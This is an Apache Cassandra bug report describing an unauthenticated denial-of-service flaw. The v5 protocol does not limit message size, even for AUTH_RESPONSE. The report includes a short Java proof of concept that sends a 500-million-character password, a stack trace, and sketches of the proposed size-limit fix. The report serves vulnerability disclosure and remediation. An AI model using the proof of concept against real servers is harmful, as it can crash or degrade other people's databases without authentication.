Dmitry Konstantinov created CASSANDRA-20052:
-----------------------------------------------

             Summary: Size of CQL messages is not limited in V5 protocol logic
                 Key: CASSANDRA-20052
                 URL: https://issues.apache.org/jira/browse/CASSANDRA-20052
             Project: Cassandra
          Issue Type: Bug
          Components: Messaging/Client
            Reporter: Dmitry Konstantinov


Size of CQL messages is not limited in V5 protocol logic
 - Since v5 frames were introduced, there is no longer any limit on CQL message 
size. native_transport_max_frame_size_in_mb, which enforced such a limit before 
v5, now applies only to pre-v5 protocol sessions; otherwise it is applied only 
while handling the initial STARTUP/OPTIONS messages and is not checked anywhere 
in the v5 logic. As a result, a v5 CQL message of any size can currently be 
sent to a Cassandra server.
 - The overload logic simply allows huge messages to be processed for free, to 
avoid starvation, so it provides no protection against the requests that are 
most dangerous from a memory pressure point of view.
 - The situation is even more dangerous: the v5 framing logic is enabled just 
after the AUTH response, so message size is not limited even for AUTH_RESPONSE 
messages from a client. This can be used for a DoS attack: an unauthenticated 
client can send a huge username/password to a Cassandra server to cause GC 
trouble or even kill it.
An easy example:
{code:java}
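import java.net.InetSocketAddress;
import java.util.Arrays;

// DataStax Java driver 4.x
import com.datastax.oss.driver.api.core.CqlSession;
import com.datastax.oss.driver.internal.core.metadata.DefaultEndPoint;

public class TestBigAuthRequest {
    public static void main(String[] args) {
        // A 500,000,000-character password, sent to the server in AUTH_RESPONSE
        String password = getString(500_000_000, '-');
        try (CqlSession session = CqlSession.builder()
                .addContactEndPoint(new DefaultEndPoint(new InetSocketAddress("localhost", 9042)))
                .withAuthCredentials("cassandra", password)
                .withLocalDatacenter("datacenter1")
                .build()) {
            session.execute("select * from system.local");
        }
    }

    // Builds a string of the given length filled with a single character
    private static String getString(int length, char charToFill) {
        if (length > 0) {
            char[] array = new char[length];
            Arrays.fill(array, charToFill);
            return new String(array);
        }
        return "";
    }
}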
{code}

A thread stack for such an invocation (captured to show the execution flow):
{code:java}
"nioEventLoopGroup-5-21@9164" prio=10 tid=0x86 nid=NA runnable
  java.lang.Thread.State: RUNNABLE
          at org.apache.cassandra.transport.messages.AuthResponse$1.decode(AuthResponse.java:45)
          at org.apache.cassandra.transport.messages.AuthResponse$1.decode(AuthResponse.java:39)
          at org.apache.cassandra.transport.Message$Decoder.decodeMessage(Message.java:432)
          at org.apache.cassandra.transport.Message$Decoder$RequestDecoder.decode(Message.java:467)
          at org.apache.cassandra.transport.Message$Decoder$RequestDecoder.decode(Message.java:459)
          at org.apache.cassandra.transport.CQLMessageHandler.processRequest(CQLMessageHandler.java:377)
          at org.apache.cassandra.transport.CQLMessageHandler$LargeMessage.onComplete(CQLMessageHandler.java:755)
          at org.apache.cassandra.net.AbstractMessageHandler$LargeMessage.supply(AbstractMessageHandler.java:561)
          at org.apache.cassandra.net.AbstractMessageHandler.processSubsequentFrameOfLargeMessage(AbstractMessageHandler.java:257)
          at org.apache.cassandra.net.AbstractMessageHandler.processIntactFrame(AbstractMessageHandler.java:229)
          at org.apache.cassandra.net.AbstractMessageHandler.process(AbstractMessageHandler.java:216)
          at org.apache.cassandra.transport.CQLMessageHandler.process(CQLMessageHandler.java:147)
          at org.apache.cassandra.net.FrameDecoder.deliver(FrameDecoder.java:330)
          at org.apache.cassandra.net.FrameDecoder.channelRead(FrameDecoder.java:294)
          at org.apache.cassandra.net.FrameDecoder.channelRead(FrameDecoder.java:277)
          at io.netty.channel.AbstractChannelHandlerContext.invokeChannelRead(AbstractChannelHandlerContext.java:379)
          at io.netty.channel.AbstractChannelHandlerContext.invokeChannelRead(AbstractChannelHandlerContext.java:365)
          at io.netty.channel.AbstractChannelHandlerContext.fireChannelRead(AbstractChannelHandlerContext.java:357)
          at io.netty.channel.DefaultChannelPipeline$HeadContext.channelRead(DefaultChannelPipeline.java:1410)
          at io.netty.channel.AbstractChannelHandlerContext.invokeChannelRead(AbstractChannelHandlerContext.java:379)
          at io.netty.channel.AbstractChannelHandlerContext.invokeChannelRead(AbstractChannelHandlerContext.java:365)
          at io.netty.channel.DefaultChannelPipeline.fireChannelRead(DefaultChannelPipeline.java:919)
          at io.netty.channel.nio.AbstractNioByteChannel$NioByteUnsafe.read(AbstractNioByteChannel.java:166)
          at io.netty.channel.nio.NioEventLoop.processSelectedKey(NioEventLoop.java:719)
          at io.netty.channel.nio.NioEventLoop.processSelectedKeysOptimized(NioEventLoop.java:655)
          at io.netty.channel.nio.NioEventLoop.processSelectedKeys(NioEventLoop.java:581)
          at io.netty.channel.nio.NioEventLoop.run(NioEventLoop.java:493)
          at io.netty.util.concurrent.SingleThreadEventExecutor$4.run(SingleThreadEventExecutor.java:989)
          at io.netty.util.internal.ThreadExecutorMap$2.run(ThreadExecutorMap.java:74)
          at io.netty.util.concurrent.FastThreadLocalRunnable.run(FastThreadLocalRunnable.java:30)
          at java.lang.Thread.run(Thread.java:829)
{code}
The provided MR contains a fix for the issue. It introduces 2 new parameters:
 - native_transport_max_message_size - limits the size of any CQL message
 - native_transport_max_auth_message_size (default = 128KiB) - limits the size 
of an auth response message
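
The kind of check these two parameters imply can be sketched as below. This is 
only an illustration, not the code from the MR: the class and method names are 
hypothetical, and the 16 MiB general limit used in main is a placeholder (only 
the 128KiB auth default comes from the description above). The sketch relies on 
the native protocol message header layout: version (1 byte), flags (1), stream 
id (2), opcode (1), body length (4), with AUTH_RESPONSE having opcode 0x0F.

```java
import java.nio.ByteBuffer;

final class MessageSizeLimitSketch {
    static final int HEADER_LENGTH = 9;           // version, flags, stream id, opcode, body length
    static final int AUTH_RESPONSE_OPCODE = 0x0F; // opcode of AUTH_RESPONSE in the native protocol

    private final long maxMessageSize;     // stands in for native_transport_max_message_size
    private final long maxAuthMessageSize; // stands in for native_transport_max_auth_message_size

    MessageSizeLimitSketch(long maxMessageSize, long maxAuthMessageSize) {
        this.maxMessageSize = maxMessageSize;
        this.maxAuthMessageSize = maxAuthMessageSize;
    }

    /** Decides from the 9-byte header alone, before any body bytes are buffered. */
    boolean isAllowed(ByteBuffer header) {
        int start = header.position();
        int opcode = header.get(start + 4) & 0xFF;
        int bodyLength = header.getInt(start + 5); // big-endian, as on the wire
        long limit = opcode == AUTH_RESPONSE_OPCODE ? maxAuthMessageSize : maxMessageSize;
        return bodyLength >= 0 && bodyLength <= limit;
    }

    /** Test helper (hypothetical): builds a v5 request header with the given opcode and body length. */
    static ByteBuffer header(int opcode, int bodyLength) {
        ByteBuffer b = ByteBuffer.allocate(HEADER_LENGTH);
        b.put((byte) 0x05).put((byte) 0).putShort((short) 0).put((byte) opcode).putInt(bodyLength);
        b.flip();
        return b;
    }

    public static void main(String[] args) {
        // 16 MiB is a placeholder value; 128 KiB is the auth default named in the issue.
        MessageSizeLimitSketch limits = new MessageSizeLimitSketch(16L * 1024 * 1024, 128L * 1024);
        System.out.println(limits.isAllowed(header(AUTH_RESPONSE_OPCODE, 1024)));
        System.out.println(limits.isAllowed(header(AUTH_RESPONSE_OPCODE, 500_000_000)));
    }
}
```

Deciding on the declared body length in the header means an oversized message 
can be rejected before its body is accumulated in memory.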

Design questions:
 * The current implementation closes the CQL connection if a message exceeds 
the limits. Logic that skips the message body could be implemented so that the 
connection stays usable, but it is more complicated and error-prone.
 * The tricky question is the default value for 
native_transport_max_message_size. 
On the one hand, we want it to be no more than 
min(native_transport_max_request_data_in_flight_per_ip, 
native_transport_max_request_data_in_flight), to reduce the chance of hitting 
the branch of logic where error handling does not work. 
On the other hand, native_transport_max_request_data_in_flight_per_ip and 
native_transport_max_request_data_in_flight can be too small, so such a default 
could break backward compatibility for existing deployments that use large 
messages with small heaps (even though that is not a good idea).
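
The trade-off around the default can be made concrete with a small sketch. The 
class and method names are hypothetical, and the byte values in main are 
illustrative numbers for a small-heap deployment, not Cassandra defaults.

```java
final class MaxMessageSizeDefaultSketch {
    /** Upper bound discussed above: min(per-IP in-flight limit, global in-flight limit). */
    static long upperBound(long maxInFlightPerIpBytes, long maxInFlightGlobalBytes) {
        return Math.min(maxInFlightPerIpBytes, maxInFlightGlobalBytes);
    }

    /** True if a message size already in use would be rejected once the bound becomes the limit. */
    static boolean wouldBreakExistingClients(long largestMessageInUseBytes,
                                             long maxInFlightPerIpBytes,
                                             long maxInFlightGlobalBytes) {
        return largestMessageInUseBytes > upperBound(maxInFlightPerIpBytes, maxInFlightGlobalBytes);
    }

    public static void main(String[] args) {
        long mib = 1024L * 1024L;
        long perIp = 12 * mib;  // illustrative value only
        long global = 51 * mib; // illustrative value only
        System.out.println("bound = " + upperBound(perIp, global) / mib + " MiB");
        System.out.println("16 MiB messages break: " + wouldBreakExistingClients(16 * mib, perIp, global));
    }
}
```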

Related observations:
1) https://issues.apache.org/jira/browse/CASSANDRA-16886 - Reduce 
native_transport_max_frame_size_in_mb (from 256M to 16M)

2) The corresponding logic in the Cassandra server internode protocol does have 
a message size limit, and the rate limiting parameters are validated to be no 
smaller than the maximum size of a single message:
internode_max_message_size = 
min(internode_application_receive_queue_reserve_endpoint_capacity, 
internode_application_send_queue_reserve_endpoint_capacity)

internode_application_receive_queue_reserve_endpoint_capacity = 128MiB
internode_application_send_queue_reserve_endpoint_capacity = 128MiB

internode_max_message_size <= 
internode_application_receive_queue_reserve_endpoint_capacity
internode_max_message_size <= 
internode_application_receive_queue_reserve_global_capacity
internode_max_message_size <= 
internode_application_send_queue_reserve_endpoint_capacity
internode_max_message_size <= 
internode_application_send_queue_reserve_global_capacity
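
The four inequalities above amount to a check like the following sketch. The 
class and method names are hypothetical; the 128MiB endpoint capacities come 
from the values listed above, while the global capacities used here are assumed 
values chosen only for illustration.

```java
import java.util.LinkedHashMap;
import java.util.Map;

final class InternodeLimitValidationSketch {
    static final long MIB = 1024L * 1024L;

    /** Returns the name of the first capacity smaller than maxMessageSize, or null if all are large enough. */
    static String firstViolation(long maxMessageSize, Map<String, Long> capacities) {
        for (Map.Entry<String, Long> e : capacities.entrySet()) {
            if (maxMessageSize > e.getValue()) {
                return e.getKey();
            }
        }
        return null;
    }

    static Map<String, Long> exampleCapacities() {
        Map<String, Long> c = new LinkedHashMap<>(); // keeps the order of the inequalities above
        c.put("internode_application_receive_queue_reserve_endpoint_capacity", 128 * MIB);
        c.put("internode_application_receive_queue_reserve_global_capacity", 512 * MIB); // assumed value
        c.put("internode_application_send_queue_reserve_endpoint_capacity", 128 * MIB);
        c.put("internode_application_send_queue_reserve_global_capacity", 512 * MIB);    // assumed value
        return c;
    }

    public static void main(String[] args) {
        System.out.println(firstViolation(128 * MIB, exampleCapacities()));
        System.out.println(firstViolation(256 * MIB, exampleCapacities()));
    }
}
```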

3) Request types according to CQL specification:
4.1.1. STARTUP, in normal cases should be small
4.1.2. AUTH_RESPONSE, in normal cases should be small
4.1.3. OPTIONS, in normal cases should be small
4.1.4. QUERY, in normal cases should be small
4.1.5. PREPARE, in normal cases should be small
4.1.6. EXECUTE <-- potentially large in case of inserts, max_mutation_size = 
commitlog_segment_size / 2; where commitlog_segment_size_in_mb = 32 (MiB)
4.1.7. BATCH <-- potentially large, max_mutation_size = commitlog_segment_size 
/ 2; where commitlog_segment_size_in_mb = 32 (MiB)
4.1.8. REGISTER, in normal cases should be small
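
For scale, the mutation size bound quoted for EXECUTE and BATCH works out as in 
this short sketch (the class and method names are hypothetical; the formula and 
the value 32 are the ones given in the list above):

```java
final class MaxMutationSizeSketch {
    /** max_mutation_size = commitlog_segment_size / 2, with the segment size given in MiB. */
    static long maxMutationSizeBytes(int commitlogSegmentSizeInMb) {
        return commitlogSegmentSizeInMb * 1024L * 1024L / 2;
    }

    public static void main(String[] args) {
        long bytes = maxMutationSizeBytes(32);
        System.out.println(bytes / (1024 * 1024) + " MiB"); // prints "16 MiB"
    }
}
```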


